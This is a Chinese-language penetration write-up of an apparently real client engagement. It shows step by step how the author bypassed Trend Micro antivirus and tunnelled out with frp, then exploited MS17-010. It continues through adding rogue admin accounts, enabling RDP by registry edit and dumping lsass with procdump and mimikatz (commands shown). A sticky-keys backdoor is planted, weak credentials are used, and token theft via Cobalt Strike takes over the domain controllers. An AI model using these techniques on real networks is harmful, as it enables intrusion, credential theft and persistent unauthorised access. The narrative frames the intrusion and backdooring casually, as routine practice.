前言
最近接了很多广告,也没输出啥好文章给兄弟们,之前搞实战的时候也没写过实战相关的文章,这次写了一篇实战域渗透的,都是常规操作,主要还是内网渗透那些东西。由于是项目,全程打码,话不多说兄弟们看文章就完事了。
Pypass趋势杀毒一步步打穿内网拿下域控
内网信息搜集
首先是通过上传拿到了一个 webshell:
然后通过 Powershell 弹到我 C2 上发现是存在域环境,域名是:**ta.org.** !
查看当前域内机器:
发现域控有多两台:
Ping 域控机器名得到域控 IP:192.168.30.110、192.168.30.111
tasklist /svc 发现当前机器存在趋势杀毒:
之后通过免杀上线到我 C2:
内网域渗透第一天
上线后做好免杀然后通过 Nbtscan 发现内网存活:
通过梼杌的插件提权失败后,然后我是先上传了 frp 先把流量代理出来:
代理成功:
然后 Metasploit 设置 socks5 代理:
通过扫了一遍内网 smb 存活发现内网 03 机器很多,猜测有 ms17010:
看来没猜错果然中奖了:
先打 08 这台把:192.168.30.116
但是失败了!
发现打 03 成功:192.168.30.8
没办法 03 只能通过执行命令,MSF 的模块没得 32 位的 Payload,我添加了一个 asp*** 用户进去:
然后开启了他的 3389 :
代码语言:javascript复制REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
成功登录到他远程桌面:
通过信息搜集发现这台机器不出网:(这里说一下,测试出网大家可以使用 NC 看看目标是否出网,测试 TCP、UDP、DNS 这三种即可,因为如果底层的协议都不出网,你在测试一些其他协议出网也毫无意义!)
由于 03 服务器不能复制文件,我只能把文件通过映射到他的磁盘来传输文件:
老思路先克隆个 administrator 用户过来:
克隆后发现之前 administrator 之前执行了一些命令:
不管了,先用 procdump 把密码读出来:
然后拖会本地后删除文件:
最后使用 mimikatz 进行解密:
代码语言:javascript复制mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
得到了 administrator 的明文密码:
代码语言:javascript复制 * Username : Administrator
* Domain : *****DB
* Password : *****@dba
然后直接登录administrator 的机器:
然后把我之前创建的 asp***** 用户删除:
通过搜集信息的时候发现了 11 年这台机器的 rdp 记录:
但是连接不上:
然后再这台机器上没找到可利用的信息后,随手留了一个粘滞键的后门:
之后扫描内网 HTTP 服务的时候发现了一个投影仪系统,弱口令撸了进去:admin:admin
由于搞站的时候比较晚了,搞到这我就去睡觉了。
内网域渗透第二天
就在昨晚睡着,做了一个梦,梦到我上课迟到了,然后回到座位上看到我作业上一个 Metasploit 的 Shell,然后就醒了!
睡醒后的,我再一次拿起 MSF 打了一遍 08 的机器,结果成功了?卧槽这个梦牛逼啊!
这尼玛渗透有时候就需要天时地利人和!
通过 Ping google 发现 192.168.30.116 能出网:
然后创建个管理员用户 asp****:
登录到他远程桌面:
随后克隆用户 adminisrtrator:
随后做了免杀让他上线到我 CS:
之后抓到了一个域用户的 hash:
代码语言:javascript复制beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[ ] host called home, sent: 438866 bytes
[ ] received output:
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : ****DSM$
Domain : ****A
Logon Server : (null)
Logon Time : 2021/1/27 上午 12:22:29
SID : S-1-5-20
msv :
[00000003] Primary
* Username : ****ADSM$
* Domain : ****A
* NTLM : 0a4b2******************************
* SHA1 : 623e30**************************
这个时候由于我们是一个工作组用户,得想办法搞到一个域用户!
通过 MSF 的令牌窃取:
发现失败了:
回头看看 Win 10 这台,使用 getsystem 直接提取成功了:
之后通过注入 System 进程成功反弹一个 System 的shell:
之后发现进程里还有其他的域用户:
再注入进程得到一个域用户的 shell:
最后抓一下密码:
然后通过定位域管 :
代码语言:javascript复制shell net group "domain admins" /domain
发现域管的账号是 A013,发现也在进程里,直接注入进程上线成功:
先查看域控是那些机器:
代码语言:javascript复制shell net group "domain controllers" /domain
发现域控有两台!然后通过 Ping 域控的主机名:****DC01、****DC02
得到域控的 IP:192.168.30.110、192.168.30.111
然后和域控建立 IPC$:
代码语言:javascript复制shell net use \****DC01ipc$
shell net use \****DC02ipc$
有域管进程就好办了,直接窃取令牌,直接拿域控横向上线:(因为域管本来就可以直接和任何机器建立连接,并且都是最大权限,所以不需要密码)
成功上线域控:
最后通过注入进程成功上线域管理员账号:
至此域渗透完结:
他内网其实还有很多机器还可以打,一些 Web 比如 Tomcat,Weblogic,Jboss 一些漏洞还是可以利用打下来的,由于我的目标就是拿到域控所以就不深入了。